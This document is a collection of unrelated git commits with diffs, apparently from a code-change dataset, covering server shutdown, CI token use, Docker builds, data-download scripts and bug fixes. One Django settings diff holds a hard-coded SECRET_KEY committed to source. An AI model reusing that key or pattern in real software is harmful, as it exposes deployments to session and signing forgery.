@@ -20,6 +20,12 @@ This example shows how to do Subpixel, LR-Check or Extended Disparity, and also ![image](https://user-images.githubusercontent.com/32992551/99454609-e59eaa00-28e3-11eb-8858-e82fd8e6eaac.png) ![image](https://user-images.githubusercontent.com/32992551/99454680-fea75b00-28e3-11eb-80bc-2004016d75e2.png) +## [Gen2] Age Gender ([here](https://github.com/luxonis/depthai-experiments/tree/master/gen2-age-gender#gen2-age--gender-recognition)) + +This shows a simple two-stage neural inference example, doing face detection and then age/gender estimation based on the face. + +[![Gen2 Age & Gender recognition](https://user-images.githubusercontent.com/5244214/106005496-954a8200-60b4-11eb-923e-b84df9de9fff.gif)](https://www.youtube.com/watch?v=PwnVrPaF-vs "Age/Gender recognition on DepthAI") + ## [Gen2] Text Detection + Optical Character Recognition (OCR) Pipeline ([here](https://github.com/luxonis/depthai-experiments/tree/master/gen2-ocr#gen2-text-detection--optical-character-recognition-ocr-pipeline)) This pipeline implements text detection (EAST) followed by optical character recognition of the detected text.
registrar: clean up start function. Removed busy waiting for the threads and removed abstractions for starting and stopping threads/servers.
@@ -8,7 +8,6 @@ import ipaddress import threading import sys import signal -import time import http.server from http.server import HTTPServer, BaseHTTPRequestHandler from socketserver import ThreadingMixIn @@ -485,52 +484,40 @@ class RegistrarServer(ThreadingMixIn, HTTPServer): http.server.HTTPServer.shutdown(self) -def do_shutdown(servers): - for server in servers: - server.shutdown() - - def start(host, tlsport, port): """Main method of the Registrar Server. This method is encapsulated in a function for packaging to allow it to be called as a function by an external program.""" - threads = [] - servers = [] - serveraddr = (host, tlsport) - RegistrarMain.metadata.create_all(engine, checkfirst=True) session = SessionManager().make_session(engine) try: count = session.query(RegistrarMain.agent_id).count() - except SQLAlchemyError as e: - logger.error('SQLAlchemy Error: %s', e) if count > 0: logger.info("Loaded %d public keys from database", count) + except SQLAlchemyError as e: + logger.error('SQLAlchemy Error: %s', e) - server = RegistrarServer(serveraddr, ProtectedHandler) + # Set up the protected registrar server + protected_server = RegistrarServer((host, tlsport), ProtectedHandler) context = web_util.init_mtls(section='registrar', generatedir='reg_ca', logger=logger) if context is not None: - server.socket = context.wrap_socket(server.socket, server_side=True) - thread = threading.Thread(target=server.serve_forever) - threads.append(thread) + protected_server.socket = context.wrap_socket(protected_server.socket, server_side=True) + thread_protected_server = threading.Thread(target=protected_server.serve_forever) - # start up the unprotected registrar server - serveraddr2 = (host, port) - server2 = RegistrarServer(serveraddr2, UnprotectedHandler) - thread2 = threading.Thread(target=server2.serve_forever) - threads.append(thread2) - - servers.append(server) - servers.append(server2) + # Set up the unprotected registrar server + unprotected_server = RegistrarServer((host, port), UnprotectedHandler) + thread_unprotected_server = threading.Thread(target=unprotected_server.serve_forever) logger.info('Starting Cloud Registrar Server on ports %s and %s (TLS) use <Ctrl-C> to stop', port, tlsport) keylime_api_version.log_api_versions(logger) - for thread in threads: - thread.start() + thread_protected_server.start() + thread_unprotected_server.start() def signal_handler(signum, frame): del signum, frame - do_shutdown(servers) + logger.info("Shutting down Registrar Server...") + protected_server.shutdown() + unprotected_server.shutdown() sys.exit(0) # Catch these signals. Note that a SIGKILL cannot be caught, so @@ -539,13 +526,5 @@ def start(host, tlsport, port): signal.signal(signal.SIGQUIT, signal_handler) signal.signal(signal.SIGINT, signal_handler) - # keep the main thread active, so it can process the signals and gracefully shutdown - while True: - if not any([thread.is_alive() for thread in threads]): - # All threads have stopped - break - # Some threads are still going - time.sleep(1) - - for thread in threads: - thread.join() + thread_protected_server.join() + thread_unprotected_server.join()
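The serve-in-a-thread, shutdown-from-a-signal-handler, then join pattern from the diff, reduced to a self-contained sketch; this uses a bare HTTPServer and a made-up port instead of the registrar classes:

    import signal
    import threading
    from http.server import BaseHTTPRequestHandler, HTTPServer

    server = HTTPServer(("127.0.0.1", 8890), BaseHTTPRequestHandler)
    thread = threading.Thread(target=server.serve_forever)
    thread.start()

    def signal_handler(signum, frame):
        # shutdown() makes serve_forever() return, so the join() below
        # unblocks on its own; no busy-wait loop is needed in the main thread.
        server.shutdown()

    signal.signal(signal.SIGINT, signal_handler)
    thread.join()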
Update main.yml. Use an admin user's token instead of the GitHub-generated token, as the latter doesn't have permission to merge to a protected branch.
@@ -49,14 +49,14 @@ jobs: id: metadata uses: dependabot/[email protected] with: - github-token: "${{ secrets.GITHUB_TOKEN }}" + github-token: "${{ secrets.BEANRUNNER_BOT_TOKEN }}" - name: Approve a PR run: gh pr review --approve "$PR_URL" env: PR_URL: ${{github.event.pull_request.html_url}} - GITHUB_TOKEN: ${{secrets.GITHUB_TOKEN}} + GITHUB_TOKEN: ${{secrets.BEANRUNNER_BOT_TOKEN}} - name: Enable auto-merge for Dependabot PRs run: gh pr merge --auto --merge "$PR_URL" env: PR_URL: ${{github.event.pull_request.html_url}} - GITHUB_TOKEN: ${{secrets.GITHUB_TOKEN}} + GITHUB_TOKEN: ${{secrets.BEANRUNNER_BOT_TOKEN}}
Oops, attributed a contribution to the wrong person! Eryk Sun provided the stanza used to check for attribution.
@@ -259,7 +259,7 @@ if args.output: # --- define helpers ---- if sys.platform == 'win32': - # thanks to Brett Cannon for this recipe + # thanks to Eryk Sun for this recipe import ctypes shlwapi = ctypes.OleDLL('shlwapi')
Send signals a little more gracefully. If there are failures, still send the signal so handlers can add additional errors.
@@ -349,7 +349,7 @@ class LocationFormSet(object): ) if self.include_user_forms: clean_commcare_user.send( - 'MobileWorkerListView.create_mobile_worker', + 'LocationFormSet', domain=self.domain, request_user=self.request_user, user=self.user, @@ -377,11 +377,12 @@ class LocationFormSet(object): @property @memoized def user(self): - user_data = self.custom_user_data.get_data_to_save() - username = self.user_form.cleaned_data['username'] - password = self.user_form.cleaned_data['password'] - first_name = self.user_form.cleaned_data['first_name'] - last_name = self.user_form.cleaned_data['last_name'] + user_data = (self.custom_user_data.get_data_to_save() + if self.custom_user_data.is_valid() else {}) + username = self.user_form.cleaned_data.get('username', "") + password = self.user_form.cleaned_data.get('password', "") + first_name = self.user_form.cleaned_data.get('first_name', "") + last_name = self.user_form.cleaned_data.get('last_name', "") return CommCareUser.create( self.domain,
use `cmake` from `anaconda` for multi-architecture support; images now build successfully for `amd64/arm64/ppc64le`.
# Use conda to resolve dependencies cross-platform FROM continuumio/miniconda3:4.11.0 as builder -ARG TARGETPLATFORM # install libpng to system for cross-architecture support # https://github.com/ANTsX/ANTs/issues/1069#issuecomment-681131938 -# Also install kitware key and get recent cmake RUN apt-get update && \ apt-get install -y --no-install-recommends \ apt-transport-https \ @@ -19,22 +17,9 @@ RUN apt-get update && \ libpng-dev \ software-properties-common -# Install cmake from binary +# install cmake binary using conda for multi-arch support # apt install fails because libssl1.0.0 is not available for newer Debian -# Download verification stuff from https://cmake.org/install/ -ARG CMAKE_VERSION=3.23.1 -RUN if [ "$TARGETPLATFORM" = "linux/amd64" ]; then ARCHITECTURE=x86_64; elif [ "$TARGETPLATFORM" = "linux/arm/v7" ]; then ARCHITECTURE=arm; elif [ "$TARGETPLATFORM" = "linux/arm64" ]; then ARCHITECTURE=aarch64; elif [ "$TARGETPLATFORM" = "linux/ppc64le" ]; then ARCHITECTURE=x86_64; else ARCHITECTURE=x86_64; fi && \ - curl -OL https://github.com/Kitware/CMake/releases/download/v${CMAKE_VERSION}/cmake-${CMAKE_VERSION}-SHA-256.txt && \ - curl -OL https://github.com/Kitware/CMake/releases/download/v${CMAKE_VERSION}/cmake-${CMAKE_VERSION}-linux-${ARCHITECTURE}.sh && \ - sha256sum -c --ignore-missing cmake-${CMAKE_VERSION}-SHA-256.txt && \ - curl -OL https://github.com/Kitware/CMake/releases/download/v${CMAKE_VERSION}/cmake-${CMAKE_VERSION}-SHA-256.txt.asc && \ - gpg --keyserver hkps://keyserver.ubuntu.com --recv-keys C6C265324BBEBDC350B513D02D2CEF1034921684 && \ - gpg --verify cmake-${CMAKE_VERSION}-SHA-256.txt.asc cmake-${CMAKE_VERSION}-SHA-256.txt && \ - mkdir /opt/cmake && \ - chmod +x cmake-${CMAKE_VERSION}-linux-${ARCHITECTURE}.sh && \ - ./cmake-${CMAKE_VERSION}-linux-${ARCHITECTURE}.sh --skip-license --prefix=/opt/cmake - -ENV PATH=/opt/cmake/bin:${PATH} +RUN conda install -c anaconda cmake WORKDIR /usr/local/src COPY environment.yml .
Adds a "full" default gauge group to GateSets loaded from text files. This avoids the issue of having to set the gauge group manually, and seems completely justified since stdinput.py's read_gateset only constructs FullyParameterizedGate objects (parameterizations are not conveyed in the text format of a GateSet).
@@ -885,4 +885,8 @@ def read_gateset(filename): if len(remainder_spam_label) > 0: gs.spamdefs[remainder_spam_label] = ('remainder', 'remainder') + #Add default gauge group -- the full group because + # we add FullyParameterizedGates above. + gs.default_gauge_group = _objs.FullGaugeGroup(gs.dim) + return gs
Update auto_threshold_methods.py: update debug method.
@@ -8,6 +8,7 @@ from plantcv.plantcv.transform import resize_factor from plantcv.plantcv import plot_image from plantcv.plantcv import print_image from plantcv.plantcv import fatal_error +from plantcv.plantcv._debug import _debug from plantcv.plantcv.threshold import mean from plantcv.plantcv.threshold import otsu from plantcv.plantcv.threshold import gaussian @@ -64,13 +65,8 @@ def auto_threshold_methods(gray_img, grid_img=True, object_type="light"): fontScale=params.text_size, color=(255, 0, 255), thickness=params.text_thickness) # Reset debug mode params.debug = debug - if params.debug == "print": - # If debug is print, save the image to a file - print_image(labeled, os.path.join(params.debug_outdir, str(params.device) + "_" + + _debug(visual=labeled, filename=os.path.join(params.debug_outdir, str(params.device) + "_" + method_names[i] + "_vis_thresholds.png")) - elif params.debug == "plot": - # If debug is plot, print to the plotting device - plot_image(labeled) labeled_imgs.append(labeled) if grid_img: @@ -85,11 +81,7 @@ def auto_threshold_methods(gray_img, grid_img=True, object_type="light"): plotting_img = resize_factor(plotting_img, factors=(0.5, 0.5)) # Reset debug mode params.debug = debug - if params.debug == "print": - # If debug is print, save the image to a file - print_image(plotting_img, os.path.join(params.debug_outdir, str(params.device) + "_vis_all_thresholds.png")) - elif params.debug == "plot": - # If debug is plot, print to the plotting device - plot_image(plotting_img) + _debug(visual=plotting_img, filename=os.path.join(params.debug_outdir, str(params.device) + + "_vis_all_thresholds.png")) return labeled_imgs
Adding reminder to remove pre-generated SECRET_KEY. Later on, we'll need environment-based default configs anyway, so this will probably be done together.
@@ -20,6 +20,7 @@ BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! +# TODO: remove this SECRET_KEY = 'oc2z%5)lu#jsxi#wpg)700z@v48)2aa_yn(a(3qg!z!fw&tr9f' # SECURITY WARNING: don't run with debug turned on in production!
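A hedged sketch of the environment-based default the note alludes to; the DJANGO_SECRET_KEY variable name and the fallback string are assumptions, not part of the commit:

    import os

    # Read the real key from the environment in production; the fallback is
    # only for local development and must never ship.
    SECRET_KEY = os.environ.get("DJANGO_SECRET_KEY", "insecure-dev-only-key")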
Pass env rebindings to lexical env get in properties TN:
@@ -11,8 +11,8 @@ from langkit.compiled_types import ( from langkit.diagnostics import check_source_language from langkit.expressions.base import ( AbstractVariable, AbstractExpression, ArrayExpr, BasicExpr, - BuiltinCallExpr, GetSymbol, PropertyDef, ResolvedExpression, Self, - auto_attr, auto_attr_custom, construct + BuiltinCallExpr, FieldAccessExpr, GetSymbol, PropertyDef, + ResolvedExpression, Self, auto_attr, auto_attr_custom, construct ) @@ -138,7 +138,12 @@ def env_get(self, env_expr, symbol_expr, resolve_unique=False, args = [('Self', construct(env_expr, LexicalEnvType)), ('Key', sym_expr), - ('Recursive', construct(recursive, BoolType))] + ('Recursive', construct(recursive, BoolType)), + ('Rebindings', FieldAccessExpr( + construct(current_prop.entity_info_arg.var), + 'Rebindings', + EnvRebindingsType + ))] # Pass the From parameter if the user wants sequential semantics if sequential:
Improvements for RPC to the gateway. Added functions: gateway_devices returns an object whose keys are device names and whose values are connector names; gateway_stats returns information about the count of messages processed in the last 5 seconds.
@@ -76,6 +76,8 @@ class TBGatewayService: } self.__gateway_rpc_methods = { "ping": self.__rpc_ping, + "stats": self.__form_statistics, + "devices": self.__rpc_devices, } self.__sheduled_rpc_calls = [] self.__self_rpc_sheduled_methods_functions = { @@ -108,17 +110,16 @@ class TBGatewayService: cur_time = time.time()*1000 if self.__sheduled_rpc_calls: for rpc_call_index in range(len(self.__sheduled_rpc_calls)): + rpc_call = self.__sheduled_rpc_calls[rpc_call_index] + if cur_time > rpc_call[0]: rpc_call = self.__sheduled_rpc_calls.pop(rpc_call_index) - if rpc_call != 'del' and cur_time > rpc_call[0]: result = None try: result = rpc_call[1]["function"](*rpc_call[1]["arguments"]) except Exception as e: log.exception(e) - log.info(result) - else: - del rpc_call - rpc_call = "del" + if result == 256: + log.warning("Error on RPC command: 256. Permission denied.") if self.__rpc_requests_in_progress and self.tb_client.is_connected(): for rpc_in_progress, data in self.__rpc_requests_in_progress.items(): if cur_time >= data[1]: @@ -446,6 +447,13 @@ class TBGatewayService: def __rpc_ping(self, *args): return {"code": 200, "resp": "pong"} + def __rpc_devices(self, *args): + data_to_send = {} + for device in self.__connected_devices: + if self.__connected_devices[device]["connector"] is not None: + data_to_send[device] = self.__connected_devices[device]["connector"].get_name() + return {"code": 200, "resp": data_to_send} + def rpc_with_reply_processing(self, topic, content): req_id = self.__rpc_requests_in_progress[topic][0]["data"]["id"] device = self.__rpc_requests_in_progress[topic][0]["device"]
Comment out some code lines in the test section.
@@ -184,26 +184,26 @@ class XORCipher(object): # Tests -crypt = XORCipher() -key = 67 +# crypt = XORCipher() +# key = 67 -# test enrcypt -print crypt.encrypt("hallo welt",key) -# test decrypt -print crypt.decrypt(crypt.encrypt("hallo welt",key), key) +# # test enrcypt +# print crypt.encrypt("hallo welt",key) +# # test decrypt +# print crypt.decrypt(crypt.encrypt("hallo welt",key), key) -# test encrypt_string -print crypt.encrypt_string("hallo welt",key) +# # test encrypt_string +# print crypt.encrypt_string("hallo welt",key) -# test decrypt_string -print crypt.decrypt_string(crypt.encrypt_string("hallo welt",key),key) +# # test decrypt_string +# print crypt.decrypt_string(crypt.encrypt_string("hallo welt",key),key) -if (crypt.encrypt_file("test.txt",key)): - print "encrypt successful" -else: - print "encrypt unsuccessful" +# if (crypt.encrypt_file("test.txt",key)): +# print "encrypt successful" +# else: +# print "encrypt unsuccessful" -if (crypt.decrypt_file("encrypt.out",key)): - print "decrypt successful" -else: - print "decrypt unsuccessful" \ No newline at end of file +# if (crypt.decrypt_file("encrypt.out",key)): +# print "decrypt successful" +# else: +# print "decrypt unsuccessful" \ No newline at end of file
Optimize check_migrated in cinder_helper.py. There is more than one in-progress status during volume migration; besides 'migrating', others include 'starting', 'completing' and so on. So we should check for the final statuses 'success' and 'error' instead.
@@ -165,7 +165,8 @@ class CinderHelper(object): def check_migrated(self, volume, retry_interval=10): volume = self.get_volume(volume) - while getattr(volume, 'migration_status') == 'migrating': + final_status = ('success', 'error') + while getattr(volume, 'migration_status') not in final_status: volume = self.get_volume(volume.id) LOG.debug('Waiting the migration of {0}'.format(volume)) time.sleep(retry_interval)
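The underlying pattern, as a generic polling sketch; get_status and the retry interval are stand-ins, not the actual Cinder client API:

    import time

    FINAL_STATUSES = ("success", "error")

    def wait_for_terminal_status(get_status, retry_interval=10):
        # Keep refreshing until the migration reaches a terminal status;
        # in-progress states (migrating, starting, completing, ...) keep waiting.
        status = get_status()
        while status not in FINAL_STATUSES:
            time.sleep(retry_interval)
            status = get_status()
        return status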
Fix print statements in README.md: print was showing a generator object instead of the names of the available datasets/metrics.
@@ -81,14 +81,14 @@ Here is a quick example: import nlp # Print all the available datasets -print(dataset.id for dataset in nlp.list_datasets()) +print([dataset.id for dataset in nlp.list_datasets()]) # Load a dataset and print the first examples in the training set squad_dataset = nlp.load_dataset('squad') print(squad_dataset['train'][0]) # List all the available metrics -print(metric.id for metric in nlp.list_metrics()) +print([metric.id for metric in nlp.list_metrics()]) # Load a metric squad_metric = nlp.load_metric('squad')
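Why the added brackets matter, shown with a plain range instead of nlp.list_datasets():

    >>> print(d for d in range(3))      # a bare generator expression prints its repr
    <generator object <genexpr> at 0x...>
    >>> print([d for d in range(3)])    # the list comprehension prints the values
    [0, 1, 2]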
update validator to rely on the sheet title for identifying whether it's a single-sheet or multi-sheet upload
@@ -45,30 +45,31 @@ class UploadedTranslationsValidator(object): self.current_rows = dict() # module_or_form_id: translations self.lang_prefix = lang_prefix self.default_language_column = self.lang_prefix + self.app.default_language - self.lang_to_compare = lang_to_compare + self.lang_to_compare = lang_to_compare or self.app.default_language self.single_sheet = False self._setup() def _setup(self): - if self.lang_to_compare: + if self._is_single_sheet(): # assume its a single sheet workbook if there is a language self.single_sheet = True - self._ensure_single_sheet() - target_lang = self.lang_to_compare self.lang_cols_to_compare = [self.lang_prefix + self.lang_to_compare] else: - target_lang = self.app.default_language self.lang_cols_to_compare = [self.lang_prefix + self.app.default_language] + if self.lang_to_compare != self.app.default_language: + self.lang_cols_to_compare.append(self.lang_prefix + self.lang_to_compare) self.app_translation_generator = AppTranslationsGenerator( - self.app.domain, self.app.get_id, None, self.app.default_language, target_lang, + self.app.domain, self.app.get_id, None, self.app.default_language, self.lang_to_compare, self.lang_prefix) self.current_sheet_name_to_module_or_form_type_and_id = dict() self.uploaded_sheet_name_to_module_or_form_type_and_id = dict() - def _ensure_single_sheet(self): - sheet = self.uploaded_workbook.worksheets[0] - if not is_single_sheet(sheet.title): - raise Exception("Expected single sheet with title %s" % SINGLE_SHEET_NAME) + def _is_single_sheet(self): + sheets_count = len(self.uploaded_workbook.worksheets) + first_sheet = self.uploaded_workbook.worksheets[0] + if sheets_count == 1 and is_single_sheet(first_sheet.title): + return True + return False def _generate_current_headers_and_rows(self): self.current_headers = { @@ -78,6 +79,7 @@ class UploadedTranslationsValidator(object): self.app, lang=self.lang_to_compare, eligible_for_transifex_only=True, + single_sheet=self.single_sheet, )} if self.single_sheet: self.current_rows = get_bulk_app_single_sheet_by_name(
Avoid parent process connection cleanup in the test suite. Fix
@@ -41,8 +41,29 @@ class ProcessSetup(multiprocessing.Process): else: django.setup() + def cleanup_connections(self): + + # Channels run `django.db.close_old_connections` as a signal + # receiver after each consumer finished event. This function + # iterate on each created connection wrapper, checks if + # connection is still usable and closes it otherwise. Under + # normal circumstances this is a very reasonable approach. + # When process starts the usual way `django.db.connections` + # contains empty connection list. But channels worker in the + # test case is created with the fork system call. This means + # file descriptors from the parent process are available in + # the connection list, but connections themselves are not + # usable. So test worker will close connections of the parent + # process and test suite will fail when it tries to flush + # database after test run. + # + # See https://github.com/django/channels/issues/614 + for alias in self.databases: + del connections[alias] + def setup_databases(self): + self.cleanup_connections() for alias, db in self.databases.items(): backend = load_backend(db['ENGINE']) conn = backend.DatabaseWrapper(db, alias)
Made gnomad genome download restartable.
@@ -33,6 +33,7 @@ recipe: gnomad_fields_to_keep_url=https://gist.githubusercontent.com/naumenko-sa/d20db928b915a87bba4012ba1b89d924/raw/cf343b105cb3347e966cc95d049e364528c86880/gnomad_fields_to_keep.txt wget --no-check-certificate -c $gnomad_fields_to_keep_url + wget -c ${url_prefix}CHECKSUMS # no chrY in gnomad genome in hg38 for chrom in $(seq 1 22;echo X) @@ -41,9 +42,44 @@ recipe: then vcf=${vcf_prefix}${chrom}_noVEP.vcf.gz vcf_url=${url_prefix}${vcf} + vcf_local=`basename $vcf_url` + get_vcf=0 + + while [ $get_vcf -lt 2 ] + do + let get_vcf=$get_vcf+1 + wget -c $vcf_url wget -c $vcf_url.tbi + sum_obs=`sum $vcf_local` + sum_exp=`grep $vcf_local CHECKSUMS | awk '{print $1,$2}'` + + sum_obs_index=`sum $vcf_local.tbi` + sum_exp_index=`grep $vcf_local.tbi CHECKSUMS | awk '{print $1,$2}'` + + if [[ $sum_obs != $sum_exp ]] + then + rm $vcf_local + fi + + if [[ $sum_obs_index != $sum_exp_index ]] + then + rm $vcf_local.tbi + fi + + if [[ $sum_obs == $sum_exp ]] & [[ $sum_obs_index == $sum_exp_index ]] + then + get_vcf=100 + fi + done + + if [ $get_vcf -ne 100 ] + then + echo "Failed to download `basename $vcf_url`" + exit + fi + fields_to_keep="INFO/"$(cat gnomad_fields_to_keep.txt | paste -s | sed s/"\t"/",INFO\/"/g) # bcftools annotate is picky about vcf header and brakes if moved down the pipe after remap gunzip -c $vcf | bcftools view -f PASS -Ov | bcftools annotate -x "^$fields_to_keep" -Ov | sed -f remap.sed | grep -v "##contig=" | gsort -m 3000 /dev/stdin $ref.fai | vt normalize -r $ref -n - | vt uniq - | bgzip -c > variation/gnomad_genome.chr${chrom}.vcf.gz
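The retry-until-the-checksum-matches idea behind the recipe, rewritten as a hedged Python sketch; sha256 and urlretrieve stand in for the recipe's wget -c plus the BSD sum values from the CHECKSUMS file, and urlretrieve does not resume partial downloads the way wget -c does:

    import hashlib
    import urllib.request

    def fetch_verified(url, dest, expected_sha256, attempts=2):
        for _ in range(attempts):
            urllib.request.urlretrieve(url, dest)
            with open(dest, "rb") as handle:
                digest = hashlib.sha256(handle.read()).hexdigest()
            # Retry the download when the checksum does not match.
            if digest == expected_sha256:
                return dest
        raise RuntimeError("failed to fetch a file with a matching checksum: " + url)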
docs(database): change GINO homepage URL. Change the GINO homepage URL from `https://python-gino.readthedocs.io/en/latest/` to `https://python-gino.org/`.
Starlette is not strictly tied to any particular database implementation. -You can use it with an asynchronous ORM, such as [GINO](https://python-gino.readthedocs.io/en/latest/), +You can use it with an asynchronous ORM, such as [GINO](https://python-gino.org/), or use regular non-async endpoints, and integrate with [SQLAlchemy](https://www.sqlalchemy.org/). In this documentation we'll demonstrate how to integrate against [the `databases` package](https://github.com/encode/databases),
Fix `check_json`: the payload is sometimes a list.
@@ -193,7 +193,7 @@ def generateOfflineThreadingID(): def check_json(j): - if j.get("payload") and j["payload"].get("error"): + if hasattr(j.get("payload"), "get") and j["payload"].get("error"): raise FBchatFacebookError( "Error when sending request: {}".format(j["payload"]["error"]), fb_error_code=None,
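A small reproduction of why the hasattr guard is needed; the payload contents are illustrative only:

    j = {"payload": ["not", "a", "dict"]}
    # j["payload"].get("error") would raise AttributeError on a list, so only
    # call .get() when the payload actually provides one.
    if hasattr(j.get("payload"), "get") and j["payload"].get("error"):
        print("payload reported an error")
    else:
        print("no dict-style error in payload")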
Update data_utils.py: switch the order of the if-elif blocks in `get_tokenizer`.
@@ -29,13 +29,13 @@ def natural_sort(l): def get_tokenizer(tokenizer_type=None, from_pretrained=True, add_padding_token=False): - if (tokenizer_type.lower() == "hf_gpt2tokenizerfast" and from_pretrained) or tokenizer_type is None: - tok = GPT2TokenizerFast.from_pretrained('gpt2') + if tokenizer_type.lower() == "hf_gp2tokenizer" and from_pretrained: + tok = GPT2Tokenizer.from_pretrained('gpt2') if add_padding_token: tok.add_special_tokens({'pad_token': '<|padding|>'}) return tok - elif tokenizer_type.lower() == "hf_gp2tokenizer" and from_pretrained: - tok = GPT2Tokenizer.from_pretrained('gpt2') + elif (tokenizer_type.lower() == "hf_gpt2tokenizerfast" and from_pretrained) or tokenizer_type is None: + tok = GPT2TokenizerFast.from_pretrained('gpt2') if add_padding_token: tok.add_special_tokens({'pad_token': '<|padding|>'}) return tok
RAMECC: Keep separate definitions for RAMECC3. RAMECC3 only has two monitoring units.
@@ -194,5 +194,93 @@ _add: derivedFrom: RAMECC1 baseAddress: 0x48023000 RAMECC3: - derivedFrom: RAMECC1 + description: RAM ECC monitoring + groupName: RAMECC baseAddress: 0x58027000 + registers: + IER: + description: RAMECC interrupt enable register + addressOffset: 0x0 + access: read-write + resetValue: 0x00000000 + fields: + GECCDEBWIE: + description: Global ECC double error on byte write interrupt enable + bitOffset: 3 + bitWidth: 1 + access: read-write + GECCDEIE: + description: Global ECC double error interrupt enable + bitOffset: 2 + bitWidth: 1 + access: read-write + GECCSEIE: + description: Global ECC single error interrupt enable + bitOffset: 1 + bitWidth: 1 + access: read-write + GIE: + description: Global interrupt enable + bitOffset: 0 + bitWidth: 1 + access: read-write + M1CR: + description: RAMECC monitor 1 configuration register + addressOffset: 0x20 + access: read-write + resetValue: 0x00000000 + M1SR: + description: RAMECC monitor 1 status register + addressOffset: 0x24 + access: read-write + resetValue: 0x00000000 + M1FAR: + description: RAMECC monitor 1 failing address register + addressOffset: 0x28 + access: read-write + resetValue: 0x00000000 + M1FDRL: + description: RAMECC monitor 1 failing data low register + addressOffset: 0x2C + access: read-write + resetValue: 0x00000000 + M1FDRH: + description: RAMECC monitor 1 failing data high register + addressOffset: 0x30 + access: read-write + resetValue: 0x00000000 + M1FECR: + description: RAMECC monitor 1 failing error code register + addressOffset: 0x34 + access: read-write + resetValue: 0x00000000 + M2CR: + description: RAMECC monitor 2 configuration register + addressOffset: 0x40 + access: read-write + resetValue: 0x00000000 + M2SR: + description: RAMECC monitor 2 status register + addressOffset: 0x44 + access: read-write + resetValue: 0x00000000 + M2FAR: + description: RAMECC monitor 2 failing address register + addressOffset: 0x48 + access: read-write + resetValue: 0x00000000 + M2FDRL: + description: RAMECC monitor 2 failing data low register + addressOffset: 0x4C + access: read-write + resetValue: 0x00000000 + M2FDRH: + description: RAMECC monitor 2 failing data high register + addressOffset: 0x50 + access: read-write + resetValue: 0x00000000 + M2FECR: + description: RAMECC monitor 2 failing error code register + addressOffset: 0x54 + access: read-write + resetValue: 0x00000000
Update mkvtomp4.py: abort if there are no audio tracks.
@@ -747,6 +747,10 @@ class MkvtoMp4: self.log.debug("Output directory: %s." % output_dir) self.log.debug("Output file: %s." % outputfile) + if len(options['audio']) == 0: + self.error.info("Conversion has no audio tracks, aborting") + return inputfile, "" + if self.output_extension == input_extension and len([x for x in [options['video']] + [x for x in options['audio'].values()] + [x for x in options['subtitle'].values()] if x['codec'] != 'copy']) == 0: self.log.info("Input and output extensions match and every codec is copy, this file probably doesn't need conversion, returning.") self.log.info(inputfile)
Catch 404 in wait_for_deletion. The message may be deleted before the bot gets a chance to react. Fixes
@@ -34,7 +34,11 @@ async def wait_for_deletion( if attach_emojis: for emoji in deletion_emojis: + try: await message.add_reaction(emoji) + except discord.NotFound: + log.trace(f"Aborting wait_for_deletion: message {message.id} deleted prematurely.") + return def check(reaction: discord.Reaction, user: discord.Member) -> bool: """Check that the deletion emoji is reacted by the appropriate user."""
cwltool: pass tmpdir as tmpdir down to workflows instead of outdir as before. This solves the issue of out_tmpdir* and tmp* directories appearing in the designated output directory after the run.
@@ -953,6 +953,7 @@ def main(args=None, stdout=sys.stdout): if args is None: args = sys.argv[1:] + #we use workdir as jobStore: options = parser.parse_args([workdir] + args) use_container = not options.no_container @@ -961,6 +962,9 @@ def main(args=None, stdout=sys.stdout): cwllogger.setLevel(options.logLevel) outdir = os.path.abspath(options.outdir) + tmp_outdir_prefix = os.path.abspath(options.tmp_outdir_prefix) + tmpdir_prefix = os.path.abspath(options.tmpdir_prefix) + fileindex = {} existing = {} make_tool_kwargs = {} @@ -1049,7 +1053,8 @@ def main(args=None, stdout=sys.stdout): make_opts = copy.deepcopy(vars(options)) make_opts.update({'tool': t, 'jobobj': {}, 'use_container': use_container, - 'tmpdir': os.path.realpath(outdir), + 'tmpdir': os.path.realpath(tmpdir_prefix), + 'tmp_outdir_prefix' : os.path.realpath(tmp_outdir_prefix), 'job_script_provider': job_script_provider}) (wf1, wf2) = makeJob(**make_opts)